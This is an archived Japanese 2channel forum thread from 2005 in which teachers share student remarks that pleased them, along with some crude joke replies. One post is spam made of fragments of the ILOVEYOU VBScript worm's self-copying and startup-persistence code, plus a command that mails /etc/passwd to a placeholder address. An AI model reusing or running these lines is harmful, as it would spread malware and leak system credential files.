2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

生徒に言われて嬉しい言葉

1 :なるたん:2005/03/27(日) 14:24:48 ID:CV26G884
「おかーさん」

2 :実習生さん:2005/03/27(日) 14:26:15 ID:uIcxyt2f
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"


3 :なるたん:2005/03/27(日) 14:30:31 ID:CV26G884
通常良くある光景だが
ココには深い意味が隠されている
生徒にとって心の根底で母と先生がどうかしていると考えられる
つまりこの言葉はすごく深いのである
※注意 女の先生の場合変な誤解を招くので注意

4 :なるたん:2005/03/27(日) 14:31:58 ID:CV26G884
すまん「生徒にとって心の根底で母と先生がどうかしていると考えられる 」
ではなく「生徒にとって心の根底で母と先生が同化していると考えられる 」

あせった、漢字をひらがなにするだけで変な意味になってしまう


5 :なるたん:2005/03/28(月) 00:25:24 ID:fAsVTNat
誰か返事してーな

6 :なるたん:2005/03/28(月) 23:26:31 ID:fAsVTNat
誰か返事してーな

7 :実習生さん:2005/03/31(木) 21:14:35 ID:BkSB/WJE
「先生んち遊び行っていい?」

「ダメだ」と言ってるけど、内心かなりうれしいんだな。

8 :実習生さん:2005/03/31(木) 21:17:15 ID:mEcgzais
何で先生んち行っちゃ駄目なんだろう。
謎だ。

9 :実習生さん:2005/03/31(木) 21:31:23 ID:BkSB/WJE
来てもいいけど、「そいつばっかひいきしてる〜」とか言われたらかわいそうじゃん。

10 :実習生さん:2005/03/31(木) 21:46:05 ID:ArEBr5EO
「センセー、大好き。」
女子生徒によく言われてます。

11 :実習生さん:皇紀2665/04/01(金) 00:16:51 ID:cHaszUmL
先生は、
あだ名で呼ばれると嬉しいものなんですか?


12 :実習生さん:皇紀2665/04/01(金) 00:23:09 ID:DBwQkxLW
あだ名にもいろいろだからねえ。
あだ名そのものはいいあだ名じゃなくても、呼び方に愛が感じられればいいかなあ。


13 :10:皇紀2665/04/01(金) 16:53:30 ID:XpRjJQnT
俺は女子生徒からよく、「○っくん」って呼ばれる。
(○は俺の下の名前の最初の文字)

14 :実習生さん:皇紀2665/04/01(金) 18:20:57 ID:R/UuzOgf
今の習ってる先生より先生(俺)の授業の方がわかりやすかった
かな他には
私は理系を選択するので、来年度は理系の授業持ってね
とかも嬉しいな
でも俺は臨採で学校かわったからその希望に応えられんわ...
_l ̄l○

15 :実習生さん:皇紀2665/04/02(土) 01:48:47 ID:LhffYbEC
生徒にいわれてうれしい言葉?
ねぇよ、そんなもん。

16 :実習生さん:皇紀2665/04/02(土) 02:11:47 ID:kHPbt37g
いわねえよ
先公たあ 話したことねー
でも話しかけてこねーと ちと・・・

17 :実習生さん:2005/04/02(土) 13:48:10 ID:QxXRp1rC
>>1
先生、臭いよ(ノ-o-)ノ

18 :実習生さん:2005,2005/04/02(土) 14:28:48 ID:4TAl26B8
おやぢ臭

19 :実習生さん:2005/04/06(水) 00:27:40 ID:uzHEdeIH
あげ

20 :JGMDTJG:2005/04/06(水) 00:39:14 ID:M3hQIH6y
全国の相馬先生の中でも特に良い相馬先生

21 :実習生さん:2005/04/06(水) 01:03:40 ID:Yyr5it3l
やっと慣れました

22 :実習生さん:2005/04/16(土) 16:22:25 ID:QwosjVOV
最近の生徒は冷たいのね

23 :実習生さん:2005/04/16(土) 19:15:10 ID:oNdrUvtb
「中に出して」

24 :♪高校生だぴょ〜ん♪:2005/04/16(土) 19:21:44 ID:44Tu9KYZ
↑オイ

25 :実習生さん:2005/04/16(土) 19:46:27 ID:PT8AFBTL
運動会のシーズンが近づいてまいりました。
近隣への騒音に配慮してスピーカーの
ボリュームは程々にお願いいたします。


26 :新任:2005/04/17(日) 16:18:50 ID:X11LEgSG
「今まで先公とか全然、信用しとらんかったけど○○先生は一人の生徒も見捨てたりせんし、
一人一人のことをほんまに真剣に考えてくれとるって分かるんよぉ。
○○先生が●中に来てくれてほんまよかったで」
って言ってくれたこと!
後は、みんなが友だち関係のこととかいろいろ相談にきてくれることかなぁ?
これからの教員生活の支えになりますわぁ↑↑

27 :実習生さん:2005/04/21(木) 20:09:00 ID:SmL5BZPr
>26

あと2年もしたら、ご多分にもれずあなたの先輩と同じように立派な カス教師 に

成長しないようにね。


私は、先輩達(ただのジジババ)をみていて、その公務員先生ぶりに幻滅し
私もあと数年たったらこういう人達になっていくんだなと思い、
やめました。

大阪の公立高校。



28 :実習生さん:2005/04/24(日) 21:13:17 ID:G8lW8OUL
やっぱり、「今日の授業、〇〇なところがすごいわかりやすかった。」と
言われたときですね。10年ぐらい前ですけど、今でも言われたときのことは
よく覚えています。

29 :実習生さん:2005/04/25(月) 21:55:15 ID:d5JLWeOz
母親「うちの子、○○先生は美人で若い先生よ!ってうちで自慢してますよ!」って保護者のことば。

30 :実習生さん:2005/04/26(火) 08:20:31 ID:6deeEAVR
授業が終わった後「ありがとうございました」といわれると大変嬉しい。
逆に「お疲れ様でした」といわれると、まるで自分がいやいや授業をしてたみたいでいやだ。
まあ、学生にとっては、バイトが終えた時の挨拶と同じ感覚で、つい「お疲れ」と
言ってしまうのだろうが。あ、ちなみに俺は中高の教師じゃなくて、大学教員です。

31 :実習生さん:2005/04/27(水) 16:46:00 ID:cK0n9Pek
ありがとうございます

32 :実習生さん:2005/04/27(水) 17:14:28 ID:q/rCqGOA
今日安全日なんです。

33 :実習生さん:2005/04/27(水) 18:00:25 ID:/Vu70b5F
↑オイ

34 :実習生さん:2005/04/28(木) 02:09:09 ID:pptmOkx5
先生って「ありがとうございました」っていう言葉すぐ忘れちゃうのかと思ってた
10何年も教えていると「ありがとうございました」「先生の授業はわかりやすいです」
とか言われなれてどうでもよくなっちゃうのかと思ってました
何年前のことでも「○○さんがありがとうございましたって言ってくれたな」
とか覚えているんですか?

35 :実習生さん:2005/04/28(木) 07:42:41 ID:0pohIkGP
中学の時の技術の先生、体罰ばっかだったけど大好きだった
転勤することになって「先生がいなくなったら学校つまんない」
と言ったら「まあ俺以上の教師は来ないだろうな」
と言いながら泣いてた

36 :実習生さん:2005/04/29(金) 13:23:31 ID:97wnf/ey
いい生徒

37 :実習生さん:2005/05/02(月) 20:36:29 ID:XGaEe2lN
アゲ

38 :hime:2005/05/02(月) 23:10:02 ID:4pApODH/
頑張っていぃ先生になるゎ!!

39 :実習生さん:2005/05/02(月) 23:12:47 ID:GtrEygFB
>>35
極上のSでつね

40 :実習生さん:2005/05/02(月) 23:58:39 ID:ubhtrZPo
「先生の授業なかったら学校やめてた」

41 :実習生さん:2005/05/05(木) 22:33:53 ID:jLWX6/Zt
age

42 :実習生さん:2005/05/05(木) 22:48:11 ID:5/3n0A3R
肢体不自由養護学校の重度重複クラスを
持っているから、日本語の発語は全くない
けど、揺さぶりとかしたときに子どもが
ニッコリしてくれるだけでうれしいやね。

43 :実習生さん:2005/05/06(金) 01:12:33 ID:MSChTn5w
塾講時。
授業のある曜日が祝日だったけど、予定がない日だったから普通にやることにしようと生徒にいったら
『先生きてくれるの!?』
と。なにげなくでた言葉なんだろうけど、やる気が感じられてとてもうれしかった。

44 :実習生さん:2005/05/06(金) 18:15:54 ID:65A/fXAc
「先生の授業って楽でいいよね」
って言われたら凹みますか?
今日思わず言っちゃった・・・

45 :実習生さん:2005/05/06(金) 21:01:00 ID:65A/fXAc
あげ

46 :実習生さん:2005/05/07(土) 21:44:29 ID:luq73W3T
特に生徒からの感謝の言葉は求めていない。
指導の成果が出るだけでうれしい。
しかし、そんな努力を評価しない管理職、
シカトする管理職にはマジむかつく。



47 :実習生さん:2005/05/07(土) 23:51:22 ID:MSFzj39P
「先生はやさしいから大好きだった」まじで涙でたよ。
しんどいけど、やっててよかったとオモタ

48 :実習生さん:2005/05/07(土) 23:53:08 ID:MSFzj39P
あと「先生の授業で勉強のおもしろさがわかった」
これは、教材研究してた甲斐があったなって思った
ただ単に知識の詰め込みでなく、勉強を面白く感じてほしかったので満足です

49 :実習生さん:2005/05/08(日) 20:42:58 ID:Pi531fcB
音楽科の教師に「音楽の道に進みたいんですけど…」って相談したら、
「自分の生徒が音楽の仕事に就きたいって思ってくれるのは嬉しい」と言われました。
やっぱりこういうことって嬉しいんですか?
教師として嬉しいのか、それとも音楽家として嬉しいのかはわかりませんけどね。

50 :実習生さん:2005/05/08(日) 23:03:19 ID:YB4sUCFm
>>49
音楽の授業がつまんなかったり嫌いだったら、
わざわざ音楽の道に進みたいなんて言いに行かないでしょ。
教師として嬉しいんだと思うよ。

51 :実習生さん:2005/05/11(水) 20:21:57 ID:CoQ/tPSx
hage


52 :実習生さん:2005/05/11(水) 20:33:00 ID:RrMRYKu3
あんまできない子が、
「今日のは分かった」といいに来てくれたとき。


53 :実習生さん:2005/05/11(水) 21:41:42 ID:Q8J7Zk1w
「先生がいなくなったら私たちどうしたらいいんですか」と泣かれた。
弱小部。赴任したときは市内大会1回戦負けが当たり前だった。
練習好きな奴らだった。
雨の中ボールを追っかけてた。
吹雪の中ボールを追っかけてた。
もうやめようと言っても、「いえ大丈夫です」と言ってボールを追っかけてた。
いや、オレが大丈夫じゃないんだけど。
おかげで大風引いたよ。
「県大会で会おうな」と言って別れた。
県大会。
「先生ー!私たちも出たよー!」と言いながら駆け寄ってくる選手達がいた。

54 :実習生さん:2005/05/12(木) 19:18:45 ID:uRHGDBY7
>53
文章がうまいと思います

55 :実習生さん:2005/05/13(金) 21:01:15 ID:dubLk4e+
女子高での生徒との談笑で
「アタシ先生とラブラブって噂立ってるんやけどー」
漏れは「いいじゃん」って答えといた。



56 :実習生さん:2005/05/13(金) 21:19:20 ID:mIoC0o1p
先生は性犯罪しそうには見えないよね。

57 :実習生さん:2005/05/13(金) 21:30:06 ID:dubLk4e+
>>56
実はそうでもないんだな。

58 :実習生さん:2005/05/21(土) 13:29:21 ID:Y4ke4nFZ
また先生の授業うけたい

って言われたらうれしい?

59 :実習生さん:2005/05/21(土) 15:53:31 ID:mZIo3+Ms
>>58
嬉しい。

「先生、オレ○○(授業科目)の内容わかってきた!」
と先日、生徒から言われた。
かなり嬉しかった。

60 :実習生さん:2005/05/26(木) 15:23:37 ID:kISV4DXH
教育に対する深い影響力を通して、ジークムント・フロイトはおそらく文化の最大の破壊者となった、
晩年、『文明とその不満』において、かれは自分の教育の結果の一部によって少なからぬ動揺を受け
たように思われるが、文化的に獲得された抑.圧を取り除ぎ、自然の欲動を解放する、というかれの
基本的な狙いは、あらゆる文明の基礎に対するもっとも致命的な攻撃を開始した。


61 :実習生さん:2005/06/10(金) 17:57:43 ID:QJ/zwPvm
教えたことが理解できて、上手くできた時の喜びようを見てるだけで
嬉しい(^-^)

62 :ばかぼん先生:2005/06/19(日) 13:01:10 ID:Y0Q/xnLX
そう、それに限るね。

63 :実習生さん:2005/06/19(日) 14:39:11 ID:1N8M0S9F
試合の引率で前任校に行ったらたくさんの生徒に声をかけられた

11 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)